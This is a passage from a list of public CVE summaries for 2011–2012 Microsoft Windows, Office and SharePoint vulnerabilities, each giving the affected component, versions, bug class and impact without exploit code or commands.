SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted response, aka "Print Spooler Service Format String Vulnerability." [CVE-2012-1850] The Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle RAP responses, which allows remote attackers to cause a denial of service (service hang) via crafted RAP packets, aka "Remote Administration Protocol Denial of Service Vulnerability." [CVE-2012-1848] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Scrollbar Calculation Vulnerability." [CVE-2012-1537] Heap-based buffer overflow in DirectPlay in DirectX 9.0 through 11.1 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted Office document, aka "DirectPlay Heap Overflow Vulnerability." [CVE-2012-1528] Integer overflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Overflow Vulnerability." [CVE-2012-1527] Integer underflow in Windows Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows local users to gain privileges via a crafted briefcase, aka "Windows Briefcase Integer Underflow Vulnerability." [CVE-2012-1194] The resolver in the DNS Server service in Microsoft Windows Server 2008 before R2 overwrites cached server names and TTL values in NS records during the processing of a response to an A record query, which allows remote attackers to trigger continued resolvability of revoked domain names via a "ghost domain names" attack. [CVE-2012-0181] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly manage Keyboard Layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout File Vulnerability." [CVE-2012-0180] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly handle user-mode input passed to kernel mode for (1) windows and (2) messages, which allows local users to gain privileges via a crafted application, aka "Windows and Messages Vulnerability." [CVE-2012-0179] Double free vulnerability in tcpip.sys in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that binds an IPv6 address to a local interface, aka "TCP/IP Double Free Vulnerability." [CVE-2012-0178] Race condition in partmgr.sys in Windows Partition Manager in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that makes multiple simultaneous Plug and Play (PnP) Configuration Manager function calls, aka "Plug and Play (PnP) Configuration Manager Vulnerability." [CVE-2012-0176] Double free vulnerability in Microsoft Silverlight 4 before 4.1.10329 on Windows allows remote attackers to execute arbitrary code via vectors involving crafted XAML glyphs, aka "Silverlight Double-Free Vulnerability." [CVE-2012-0175] The Shell in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted name for a (1) file or (2) directory, aka "Command Injection Vulnerability." [CVE-2012-0174] Windows Firewall in tcpip.sys in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly enforce firewall rules for outbound broadcast packets, which allows remote attackers to obtain potentially sensitive information by observing broadcast traffic on a local network, aka "Windows Firewall Bypass Vulnerability." [CVE-2012-0173] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability," a different vulnerability than CVE-2012-0002. [CVE-2012-0165] GDI+ in Microsoft Windows Vista SP2 and Server 2008 SP2 and Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 does not properly validate record types in EMF images, which allows remote attackers to execute arbitrary code via a crafted image, aka "GDI+ Record Type Vulnerability." [CVE-2012-0164] Microsoft .NET Framework 4 does not properly compare index values, which allows remote attackers to cause a denial of service (application hang) via crafted requests to a Windows Presentation Foundation (WPF) application, aka ".NET Framework Index Comparison Vulnerability." [CVE-2012-0159] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview [CVE-2012-0157] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle window messaging, which allows local users to gain privileges via a crafted application that calls the PostMessage function, aka "PostMessage Function Vulnerability." [CVE-2012-0156] DirectWrite in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly render Unicode characters, which allows remote attackers to cause a denial of service (application hang) via a (1) instant message or (2) web site, aka "DirectWrite Application Denial of Service Vulnerability." [CVE-2012-0154] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers keyboard layout errors, aka "Keyboard Layout Use After Free Vulnerability." [CVE-2012-0152] The Remote Desktop Protocol (RDP) service in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (application hang) via a series of crafted packets, aka "Terminal Server Denial of Service Vulnerability." [CVE-2012-0151] The Authenticode Signature Verification function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and Windows 8 Consumer Preview does not properly validate the digest of a signed portable executable (PE) file, which allows user-assisted remote attackers to execute arbitrary code via a modified file with additional content, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2012-0150] Buffer overflow in msvcrt.dll in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, aka "Msvcrt.dll Buffer Overflow Vulnerability." [CVE-2012-0149] afd.sys in the Ancillary Function Driver in Microsoft Windows Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2012-0148] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "AfdPoll Elevation of Privilege Vulnerability." [CVE-2012-0013] Incomplete blacklist vulnerability in the Windows Packager configuration in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted ClickOnce application in a Microsoft Office document, related to .application files, aka "Assembly Execution Vulnerability." [CVE-2012-0009] Untrusted search path vulnerability in the Windows Object Packager configuration in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse executable file in the current working directory, as demonstrated by a directory that contains a file with an embedded packaged object, aka "Object Packager Insecure Executable Launching Vulnerability." [CVE-2012-0006] The DNS server in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 does not properly handle objects in memory during record lookup, which allows remote attackers to cause a denial of service (daemon restart) via a crafted query, aka "DNS Denial of Service Vulnerability." [CVE-2012-0005] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2, when a Chinese, Japanese, or Korean system locale is used, can access uninitialized memory during the processing of Unicode characters, which allows local users to gain privileges via a crafted application, aka "CSRSS Elevation of Privilege Vulnerability." [CVE-2012-0004] Unspecified vulnerability in DirectShow in DirectX in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted media file, related to Quartz.dll, Qdvd.dll, closed captioning, and the Line21 DirectShow filter, aka "DirectShow Remote Code Execution Vulnerability." [CVE-2012-0003] Unspecified vulnerability in winmm.dll in Windows Multimedia Library in Windows Media Player (WMP) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via a crafted MIDI file, aka "MIDI Remote Code Execution Vulnerability." [CVE-2012-0002] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-0001] The kernel in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly load structured exception handling tables, which allows context-dependent attackers to bypass the SafeSEH security feature by leveraging a Visual C++ .NET 2003 application, aka "Windows Kernel SafeSEH Bypass Vulnerability." [CVE-2011-5046] The Graphics Device Interface (GDI) in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted data, as demonstrated by a large height attribute of an IFRAME element rendered by Safari, aka "GDI Access Violation Vulnerability." [CVE-2011-4695] Unspecified vulnerability in Microsoft Windows 7 SP1, when Java is installed, allows local users to bypass Internet Explorer sandbox restrictions and gain privileges via unknown vectors, as demonstrated by the White Phosphorus wp_ie_sandbox_escape module for Immunity CANVAS. NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2011-4434] Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 do not properly enforce AppLocker rules, which allows local users to bypass intended access restrictions via a (1) macro or (2) scripting feature in an application, as demonstrated by Microsoft Office applications and the SANDBOX_INERT and LOAD_IGNORE_CODE_AUTHZ_LEVEL flags. [CVE-2011-3408] Csrsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2011-3406] Buffer overflow in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote authenticated users to execute arbitrary code via a crafted query that leverages incorrect memory initialization, aka "Active Directory Buffer Overflow Vulnerability." [CVE-2011-3402] Unspecified vulnerability in the TrueType font parsing engine in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted font data in a Word document or web page, as exploited in the wild in November 2011 by Duqu, aka "TrueType Font Parsing Vulnerability." [CVE-2011-3401] ENCDEC.DLL in Windows Media Player and Media Center in Microsoft Windows XP SP2 and SP3, Windows Vista SP2, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .dvr-ms file, aka "Windows Media Player DVR-MS Memory Corruption Vulnerability." [CVE-2011-3400] Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 do not properly handle OLE objects in memory, which allows remote attackers to execute arbitrary code via a crafted object in a file, aka "OLE Property Vulnerability." [CVE-2011-3397] The Microsoft Time component in DATIME.DLL in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted web site that leverages an unspecified "binary behavior" in Internet Explorer, aka "Microsoft Time Remote Code Execution Vulnerability." [CVE-2011-3389] The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. [CVE-2011-2019] Untrusted search path vulnerability in Microsoft Internet Explorer 9 on Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an HTML file, aka "Internet Explorer Insecure Library Loading Vulnerability." [CVE-2011-2018] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 does not properly initialize objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2011-2016] Untrusted search path vulnerability in Windows Mail and Windows Meeting Space in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .eml or .wcinv file, aka "Windows Mail Insecure Library Loading Vulnerability." [CVE-2011-2014] The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not examine Certificate Revocation Lists (CRLs), which allows remote authenticated users to bypass intended certificate restrictions and access Active Directory resources by leveraging a revoked X.509 certificate for a domain account, aka "LDAPS Authentication Bypass Vulnerability." [CVE-2011-2013] Integer overflow in the TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code by sending a sequence of crafted UDP packets to a closed port, aka "Reference Counter Overflow Vulnerability." [CVE-2011-2011] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-2009] Untrusted search path vulnerability in Windows Media Center in Microsoft Windows Vista SP2 and Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista, allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Media Center Insecure Library Loading Vulnerability." [CVE-2011-2005] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-2004] Array index error in win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a crafted TrueType font file, aka "TrueType Font Parsing Vulnerability," a different vulnerability than CVE-2011-3402. [CVE-2011-2003] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .fon file, aka "Font Library File Buffer Overrun Vulnerability." [CVE-2011-2002] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle TrueType fonts, which allows local users to cause a denial of service (system hang) via a crafted font file, aka "Win32k TrueType Font Type Translation Vulnerability." [CVE-2011-1991] Multiple untrusted search path vulnerabilities in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .rtf, or .txt file, related to (1) deskpan.dll in the Display Panning CPL Extension, (2) EAPHost Authenticator Service, (3) Folder Redirection, (4) HyperTerminal, (5) the Japanese Input Method Editor (IME), and (6) Microsoft Management Console (MMC), aka "Windows Components Insecure Library Loading Vulnerability." [CVE-2011-1985] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1984] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges by sending crafted packets over the loopback interface, aka "WINS Local Elevation of Privilege Vulnerability." [CVE-2011-1975] Untrusted search path vulnerability in the Data Access Tracing component in Windows Data Access Components (Windows DAC) 6.0 in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an Excel .xlsx file, aka "Data Access Components Insecure Library Loading Vulnerability." [CVE-2011-1974] NDISTAPI.sys in the NDISTAPI driver in Remote Access Service (RAS) in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "NDISTAPI Elevation of Privilege Vulnerability." [CVE-2011-1971] The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse file metadata, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Metadata Parsing DOS Vulnerability." [CVE-2011-1970] The DNS server in Microsoft Windows Server 2003 SP2 and Windows Server 2008 SP2, R2, and R2 SP1 does not properly initialize memory, which allows remote attackers to cause a denial of service (service outage) via a query for a nonexistent domain, aka "DNS Uninitialized Memory Corruption Vulnerability." [CVE-2011-1968] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly process packets in memory, which allows remote attackers to cause a denial of service (reboot) by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, as exploited in the wild in 2011, aka "Remote Desktop Protocol Vulnerability." [CVE-2011-1967] Winsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Vulnerability." [CVE-2011-1966] The DNS server in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 does not properly handle NAPTR queries that trigger recursive processing, which allows remote attackers to execute arbitrary code via a crafted query, aka "DNS NAPTR Query Vulnerability." [CVE-2011-1965] Tcpip.sys in the TCP/IP stack in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 does not properly implement URL-based QoS, which allows remote attackers to cause a denial of service (reboot) via a crafted URL to a web server, aka "TCP/IP QOS Denial of Service Vulnerability." [CVE-2011-1894] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for embedded content in an HTML document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted EMBED element in a web page that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-1893] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010, Windows SharePoint Services 2.0 and 3.0 SP2, and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "SharePoint XSS Vulnerability." [CVE-2011-1892] Microsoft Office Groove 2007 SP2, SharePoint Workspace 2010 Gold and SP1, Office Forms Server 2007 SP2, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Office Groove Data Bridge Server 2007 SP2, Office Groove Management Server 2007 SP2, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, and Office Web Apps 2010 Gold and SP1 do not properly handle Web Parts containing XML classes referencing external entities, which allows remote authenticated users to read arbitrary files via a crafted XML and XSL file, aka "SharePoint Remote File Disclosure Vulnerability." [CVE-2011-1891] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in a request to a script, aka "Contact Details Reflected XSS Vulnerability." [CVE-2011-1888] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1887] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1886] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 does not properly validate the arguments to functions, which allows local users to read arbitrary data from kernel memory via a crafted application that triggers a NULL pointer dereference, aka "Win32k Incorrect Parameter Validation Allows Information Disclosure Vulnerability." [CVE-2011-1885] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1884] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1883] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1882] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1881] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1880] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1879] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1878] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1877] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-1876] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1875] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1874] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1873] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate pointers during the parsing of OpenType (aka OTF) fonts, which allows remote attackers to execute arbitrary code via a crafted font file, aka "Win32k OTF Validation Vulnerability." [CVE-2011-1872] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, R2, and R2 SP1 allows guest OS users to cause a denial of service (host OS infinite loop) via malformed machine instructions in a VMBus packet, aka "VMBus Persistent DoS Vulnerability." [CVE-2011-1871] Tcpip.sys in the TCP/IP stack in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a series of crafted ICMP messages, aka "ICMP Denial of Service Vulnerability." [CVE-2011-1870] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutputString Vulnerability." [CVE-2011-1869] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote DFS servers to cause a denial of service (system hang) via a crafted referral response, aka "DFS Referral Response 